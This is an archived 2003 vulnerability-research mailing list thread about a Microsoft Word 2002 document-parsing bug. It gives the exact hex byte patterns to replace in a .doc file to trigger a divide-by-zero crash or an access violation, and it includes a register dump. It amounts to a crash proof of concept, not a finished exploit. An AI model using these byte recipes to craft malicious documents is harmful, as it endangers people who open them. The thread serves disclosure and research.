Vulnerability Development mailing list archives
Re: Bug in Microsoft Word
From: Bahaa Naamneh <b_naamneh () hotmail com>
Date: 8 Oct 2003 17:58:09 -0000
In-Reply-To: <oprwngn1zgab5ge7 () smtp2 adsl ya com> This pattern 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 can be found, I think ,in most of the office 2002 versions. I have found this pattern in two versions 2002(10.2627.3311) and 2002(10.5522.4219)SP-2 in some versions like version[2002 (10.2627.2625)] this pattern exist: 00 00 00 00 00 00 97 02 00 00 34 00 00 00 69 02 00 00 00 00 00 00 69 or 00 00 00 00 00 00 97 02 00 00 38 00 00 00 69 02 00 00 00 00 00 00 69 if you replace it with: 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 it will crash because of divide by zero. but if you change it to 00 00 00 00 00 00 97 02 00 00 34 00 00 00 69 02 00 00 00 00 00 62 69 You'll be able to see an access violation such as: 301D33D7 mov ecx,dword ptr [eax] EAX = 00200072 EBX = 00000002 ECX = 009E366C EDX = 00000000 ESI = 009D0288 EDI = 00000000 EIP = 301D33D7 ESP = 00126364 EBP = 00000000 EFL = 00000206 ------------------------ Bahaa Naamneh http://www.bsecurity.tk
Received: (qmail 18777 invoked from network); 8 Oct 2003 13:41:44 -0000 Received: from outgoing3.securityfocus.com (205.206.231.27) by mail.securityfocus.com with SMTP; 8 Oct 2003 13:41:44 -0000 Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) by outgoing3.securityfocus.com (Postfix) with QMQP id ED648A3281; Wed, 8 Oct 2003 07:48:43 -0600 (MDT) Mailing-List: contact vuln-dev-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <vuln-dev.list-id.securityfocus.com> List-Post: <mailto:vuln-dev () securityfocus com> List-Help: <mailto:vuln-dev-help () securityfocus com> List-Unsubscribe: <mailto:vuln-dev-unsubscribe () securityfocus com> List-Subscribe: <mailto:vuln-dev-subscribe () securityfocus com> Delivered-To: mailing list vuln-dev () securityfocus com Delivered-To: moderator for vuln-dev () securityfocus com Received: (qmail 28158 invoked from network); 6 Oct 2003 19:44:47 -0000 Date: Tue, 07 Oct 2003 03:49:03 +0200 To: "vuln-dev () securityfocus com" <vuln-dev () securityfocus com> Subject: Re: Bug in Microsoft Word From: Pedro Jota Calvorota <calvorota () ya com> Organization: Calvos Unidos Content-Type: text/plain; format=flowed; charset=iso-8859-15 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-ID: <oprwngn1zgab5ge7 () smtp2 adsl ya com> User-Agent: Opera7.20/Win32 M2 build 3144 I would like to make you notice two things: - I downloaded the doc file from http://www12.brinkster.com/bsecurity/Doc1.doc and checked it with MS Ofcicce XP version and it crashes. Oddly if i do it with word97, it doesn't not crash but shows the cursor at the end of the first line :| - I just can't find the pattern 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 in any doc i create, word97, or XP... is it the same in any varsion? i don't even find de "b4 01" pattern to be able to modify the EAX register. Can you explain it a little deeper? Thanks a lot. -- Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
Current thread:
- Bug in Microsoft Word Bahaa Naamneh (Oct 03)
- <Possible follow-ups>
- Re: Bug in Microsoft Word Pedro Jota Calvorota (Oct 08)
- RE: Bug in Microsoft Word Arjun Pednekar (Oct 09)
- Re: Bug in Microsoft Word Bahaa Naamneh (Oct 08)